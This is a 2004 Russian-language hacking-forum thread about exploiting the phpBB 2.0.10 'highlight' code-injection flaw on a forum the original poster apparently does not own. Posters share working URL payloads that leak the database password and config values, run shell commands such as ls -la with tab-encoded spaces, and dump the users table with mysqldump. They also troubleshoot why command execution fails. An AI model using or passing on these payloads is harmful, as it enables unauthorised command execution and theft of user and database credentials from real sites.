ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpbb 2.0.10 тех вопрос
  #1  
Старый 29.11.2004, 01:52
:||
Новичок
Регистрация: 29.11.2004
Сообщений: 6
Провел на форуме:
0

Репутация: 0
По умолчанию phpbb 2.0.10 тех вопрос

Наткнулся на один форум, там &highlight=%2527.$poster=$dbpasswd.%2527 - бага канает, выводится пасс для бд, так же и логин, но больше ни одна бага не работает, если ковырнуть на &highlight=%2527.$poster=%60$ls%60.%2527&ls=
id;uname%20-a; - выводится )b#i
и всё ни одна из команд не работает, врятли багу там прикрыли, кто нить с этим сталкивался???
 
Ответить с цитированием

  #2  
Старый 29.11.2004, 02:04
Xalegi
Участник форума
Регистрация: 24.11.2004
Сообщений: 126
Провел на форуме:
137630

Репутация: 11
По умолчанию

если не ошибаюсь %20 - это не тот символ который здесь заменяет пробел...
 
Ответить с цитированием

  #3  
Старый 29.11.2004, 02:06
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

Вот после этого ты должен писать команды которые там frik написал

id;uname%20-a;
 
Ответить с цитированием

  #4  
Старый 29.11.2004, 02:07
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

Вроде бы... там так написано типа... потому что закрывать эту всю муть должны вроде б ы символы %2527, нЭ?
 
Ответить с цитированием

  #5  
Старый 29.11.2004, 02:11
:||
Новичок
Регистрация: 29.11.2004
Сообщений: 6
Провел на форуме:
0

Репутация: 0
По умолчанию

Дык ясный день, дело в том что ни одна из команд не работает, типа cd..;pwd;ls -l - думаю понятно что это, в том то и беда, что не работают они, где-то я читал мол значит сервак не под линухом, но каким макаром тогда берётся инфа из config.php с помощью
&highlight=%2527.$poster=$dbpasswd.%2527 ???
 
Ответить с цитированием

  #6  
Старый 29.11.2004, 02:38
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

Ну тогда не знаю, дай линк хоть на тот форум.
 
Ответить с цитированием

  #7  
Старый 29.11.2004, 05:38
X-Seven
Новичок
Регистрация: 07.11.2004
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию

Скорее всего,выключен register globals.
Попробуй вот так:
p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527
Вместо пробела %09
Дамп базы:
p=123&highlight=%2527.$poster=%60/путь/mysqldump%09-uИмяЮзераБазы%09-pПарольБазы%09ИмяБазы%09преф кс_users%09>%09db.sql%60.%2527

ИмяЮзераБазы:$poster=$dbuser
ПарольБазы:$poster=$dbpasswd
ИмяБазы:$poster=$dbname
Префикс:$poster=$table_prefix(обычно phpbb_)
 
Ответить с цитированием

  #8  
Старый 29.11.2004, 09:47
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

X-Seven, а /путь/
чего указывать? Покажи пример...
uИмяЮзераБазы%09- А зачем эта чёрточка в конце?
Вообщем только что проверил - не работает дамп базы.
 
Ответить с цитированием

  #9  
Старый 29.11.2004, 10:08
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

Вот так типа по этой схеме надо делать:
mysqldump --opt -uLOGIN -pPASS DBNAME > dump.sql

LOGIN=dbuser
PASS=dbpasswd
DBNAME=dbname
 
Ответить с цитированием

  #10  
Старый 29.11.2004, 21:02
:||
Новичок
Регистрация: 29.11.2004
Сообщений: 6
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от X-Seven  
Скорее всего,выключен register globals.
Попробуй вот так:
p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527
Вместо пробела %09
Дамп базы:
p=123&highlight=%2527.$poster=%60/путь/mysqldump%09-uИмяЮзераБазы%09-pПарольБазы%09ИмяБазы%09преф кс_users%09>%09db.sql%60.%2527

ИмяЮзераБазы:$poster=$dbuser
ПарольБазы:$poster=$dbpasswd
ИмяБазы:$poster=$dbname
Префикс:$poster=$table_prefix(обычно phpbb_)
Ты прав, register globals выключен, но беда какая-то получается, ставлю вместо пробела - %09 но эфект тот же, зато весь конфиг.пхп вылажен, странно как-то получается =/
Да и если не трудно, то расскажи про путь к дампу.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ